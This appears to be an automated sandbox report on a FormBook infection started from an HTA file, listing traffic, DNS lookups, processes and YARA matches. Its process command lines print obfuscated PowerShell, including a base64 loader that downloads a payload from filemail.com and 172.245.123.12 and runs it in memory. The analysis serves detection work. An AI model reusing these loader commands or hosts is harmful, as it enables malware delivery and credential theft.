                                                            Dec 2, 2024 09:18:34.773829937 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.773952007 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.774028063 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.775106907 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.775172949 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.775245905 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.776333094 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.776443005 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.776513100 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.777566910 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.777669907 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.777743101 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.778821945 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.778927088 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.778996944 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.780062914 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.780203104 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.780273914 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.781348944 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.781469107 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.781541109 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.782567024 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.782669067 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.782761097 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.783807039 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.783931017 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.784007072 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.785126925 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.785161018 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.785243034 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.786302090 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.786418915 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.786490917 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.787552118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.834402084 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.842293978 CET4973980192.168.2.4172.245.123.12
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 2, 2024 09:18:11.678822041 CET | 50746 | 53 | 192.168.2.4 | 1.1.1.1
                                                            Dec 2, 2024 09:18:12.002547026 CET | 53 | 50746 | 1.1.1.1 | 192.168.2.4
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Dec 2, 2024 09:18:11.678822041 CET | 192.168.2.4 | 1.1.1.1 | 0x2b1d | Standard query (0) | 1016.filemail.com | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Dec 2, 2024 09:18:12.002547026 CET | 1.1.1.1 | 192.168.2.4 | 0x2b1d | No error (0) | 1016.filemail.com | ip.1016.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 2, 2024 09:18:12.002547026 CET | 1.1.1.1 | 192.168.2.4 | 0x2b1d | No error (0) | ip.1016.filemail.com | | 142.215.209.77 | A (IP address) | IN (0x0001) | false
                                                            • 1016.filemail.com
                                                            • 172.245.123.12
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.4 | 49732 | 172.245.123.12 | 80 | 3300 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 2, 2024 09:18:05.413888931 CET | 324 | OUT | GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 09:18:06.576272964 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 16:18:06 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 02:06:06 GMT
                                                            ETag: "2597c-6283ffdcaf502"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 153980
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: image/tiff


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.4 | 49739 | 172.245.123.12 | 80 | 6592 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 2, 2024 09:18:32.599550962 CET | 79 | OUT | GET /361/TELNERA.txt HTTP/1.1
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 09:18:33.752301931 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 16:18:33 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 01:42:13 GMT
                                                            ETag: "5d2ac-6283fa86a38cf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 381612
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/plain


                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                            0    192.168.2.4    49733    142.215.209.77    443    6592    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp    Bytes transferred    Direction    Data
                                                            2024-12-02 08:18:13 UTC    198    OUT    GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                            Host: 1016.filemail.com
                                                            Connection: Keep-Alive
                                                            2024-12-02 08:18:14 UTC    328    IN    HTTP/1.1 200 OK
                                                            Content-Length: 2230233
                                                            Content-Type: image/jpeg
                                                            Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: 1c84779d9886011235a5e11f64ee8efb
                                                            X-Transfer-ID: qxdlxyadbikkvgc
                                                            Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                            Date: Mon, 02 Dec 2024 08:18:13 GMT
                                                            Connection: close



                                                            Target ID:0
                                                            Start time:03:18:00
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta"
                                                            Imagebase:0x250000
                                                            File size:13'312 bytes
                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:03:18:01
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:03:18:01
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:03:18:01
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                                                            Imagebase:0xf90000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:03:18:04
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                                                            Imagebase:0x7b0000
                                                            File size:2'141'552 bytes
                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:03:18:04
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"
                                                            Imagebase:0x7ff7699e0000
                                                            File size:46'832 bytes
                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:03:18:09
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                                                            Imagebase:0x810000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:03:18:10
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                                                            Imagebase:0xf90000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:03:18:10
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:03:18:34
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                            Imagebase:0xfa0000
                                                            File size:56'368 bytes
                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.1703170021.00000000066E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_66e0000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction ID: 5c66d6001a52e76a3e0ba55931fd1c4df277939e826c9e274b1856515548475a
                                                              • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction Fuzzy Hash:

                                                              Execution Graph

                                                              Execution Coverage:4.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:113
                                                              Total number of Limit Nodes:9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ac9f45d9b811bef9319f4ec107a5f8c5e115fd2b13354f9020b287f0b66d234
                                                              • Instruction ID: da8a5cfe37977e85124986881bd24089f1bb231bc40af7cd16cee4dcf6c0ba64
                                                              • Opcode Fuzzy Hash: 2ac9f45d9b811bef9319f4ec107a5f8c5e115fd2b13354f9020b287f0b66d234
                                                              • Instruction Fuzzy Hash: BCD1F975A15219AFCF05DF98D884A9EFBF2FF48310F248159E818AB351C771AD81CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-2296240322
                                                              • Opcode ID: d23b56d805a94a9aa843f41106e8ca31e25ac4681ddc1d3ffe93a4173d07a109
                                                              • Instruction ID: 263f7b7bf04df79b88f986d7e79df056cdb6a26fe7a6a00659b016b54483b491
                                                              • Opcode Fuzzy Hash: d23b56d805a94a9aa843f41106e8ca31e25ac4681ddc1d3ffe93a4173d07a109
                                                              • Instruction Fuzzy Hash: BF1228F27042169FEB158B68A81077BBBA6BFD5311F14C46AD909CF281DB31CD82C7A1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq$tPdq
                                                              • API String ID: 0-1003797653
                                                              • Opcode ID: 59948c3938ed262f696fd57701672ed2f57d2ff0bbf613b1e60219064166f971
                                                              • Instruction ID: 2c7f612fee98ff68590d4c466f97f01764ce4ed008b949a3b9d74cd43c400709
                                                              • Opcode Fuzzy Hash: 59948c3938ed262f696fd57701672ed2f57d2ff0bbf613b1e60219064166f971
                                                              • Instruction Fuzzy Hash: 1FF1D4B2B00245AFDB149F68D811B6ABBE6EFC9310F248469ED099B390DB71DD41CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq$tPdq
                                                              • API String ID: 0-1003797653
                                                              • Opcode ID: 4c26a7be3f5999b865908f25100c6ed0cfd02ee5069b1a8245ee23e93d19a4bc
                                                              • Instruction ID: bb4e998eb014d9a613b276257670de17d69068fb71e4984d49a89292ce9cc7e7
                                                              • Opcode Fuzzy Hash: 4c26a7be3f5999b865908f25100c6ed0cfd02ee5069b1a8245ee23e93d19a4bc
                                                              • Instruction Fuzzy Hash: E8515AF2704214ABEB145B68981076EBBE6EF85B10F54845AE94CDF3C1CB31DD45C7A1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 415 c91bf8-c97e52 418 c97e5d-c97e63 415->418 419 c97e54-c97e5a 415->419 420 c97e71-c97ea6 URLDownloadToFileW 418->420 421 c97e65-c97e6e 418->421 419->418 423 c97ea8-c97eae 420->423 424 c97eaf-c97ec3 420->424 421->420 423->424
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00C97E99
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: e1b95677fcb7cb92a3f1970460ebd9f22ec284122954d7ab92adc5a105269da4
                                                              • Instruction ID: 5c732140670985c383165213d3d97592c5d970d71c0cbc37780d4859cbbea7fa
                                                              • Opcode Fuzzy Hash: e1b95677fcb7cb92a3f1970460ebd9f22ec284122954d7ab92adc5a105269da4
                                                              • Instruction Fuzzy Hash: 732117B5D11619EFCF04DF99D988ADEFBF4FB48310F108159E918A7250D374AA54CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 426 c97e69-c97e7a 428 c97e7c-c97e83 426->428 429 c97e84-c97ea6 URLDownloadToFileW 426->429 428->429 430 c97ea8-c97eae 429->430 431 c97eaf-c97ec3 429->431 430->431
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00C97E99
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: 2a6371b8cb558d99a14e37ba541a7ca30f83da4620d696541a3b22200c919e19
                                                              • Instruction ID: edeb837bf9443b24c02639f76b199277f51ad150f290eea088192266ef236be5
                                                              • Opcode Fuzzy Hash: 2a6371b8cb558d99a14e37ba541a7ca30f83da4620d696541a3b22200c919e19
                                                              • Instruction Fuzzy Hash: FDF09AB2915608EEDF00EF99D8487CDFBB0FF48324F188689E52966181D3791A58DB61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 433 c97e89-c97ea6 URLDownloadToFileW 434 c97ea8-c97eae 433->434 435 c97eaf-c97ec3 433->435 434->435
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00C97E99
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: 528b63f74194eaec70ef48a0677805cbb7e859d5ebb187d08eea0e835abba473
                                                              • Instruction ID: f978652799a5582bf5717b403055d38cafeab7c0115558d33224b0ccf1f9a3fe
                                                              • Opcode Fuzzy Hash: 528b63f74194eaec70ef48a0677805cbb7e859d5ebb187d08eea0e835abba473
                                                              • Instruction Fuzzy Hash: E5E09AB280A7489ECF00DF99E4083CCFBB0AB59324F24818AD018A3240C3751AA8CBA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq
                                                              • API String ID: 0-2402691438
                                                              • Opcode ID: 62473ae62eac97c436ba593759e1a575a8fa08b683773c28152afffac8996266
                                                              • Instruction ID: 3435cda7976d6ebf3aabe67d208e83c01f9230f1b10eefc2aeabc5993097ea5a
                                                              • Opcode Fuzzy Hash: 62473ae62eac97c436ba593759e1a575a8fa08b683773c28152afffac8996266
                                                              • Instruction Fuzzy Hash: 1391D3F2A002459BEB24CF58D541B6ABBB6FF88710F588459EC19AB390D771ED41CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d85618ccf3a687f16053f7c40db1dd2796401e1a765c72575e0ce0c3da0b733
                                                              • Instruction ID: c9f9395e916ec35f3ec196554bdafdbf70410bfa1a6b9e335823f2eccd0352c3
                                                              • Opcode Fuzzy Hash: 7d85618ccf3a687f16053f7c40db1dd2796401e1a765c72575e0ce0c3da0b733
                                                              • Instruction Fuzzy Hash: D7411EF2B042029FEB10CF159E40B7E7BA5BF85214F558499D608DF291D731DD41CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813206093.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_b9d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2ef96e6ef92850939dbba0bdaeadbf6b6584972260f5dc1c9fc793a149907e2
                                                              • Instruction ID: 8b25c52920f2c207a0f7fb3f4d748eb8f08d48cca2e9534f15ea10bc3009a8bf
                                                              • Opcode Fuzzy Hash: f2ef96e6ef92850939dbba0bdaeadbf6b6584972260f5dc1c9fc793a149907e2
                                                              • Instruction Fuzzy Hash: E40126715093449AEB208B2ACCC4B67FFD8DF51325F18C5AAEC4C0B282C7799841C7B1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813206093.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_b9d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 439fd35de658c69eb6c5a3c5a80954ee6b521676755ab62a37cabe269fec4771
                                                              • Instruction ID: 8667f4fb93fc3043ce5a8930099524d1a0f32a33c3355e36e10b0c65bc01601f
                                                              • Opcode Fuzzy Hash: 439fd35de658c69eb6c5a3c5a80954ee6b521676755ab62a37cabe269fec4771
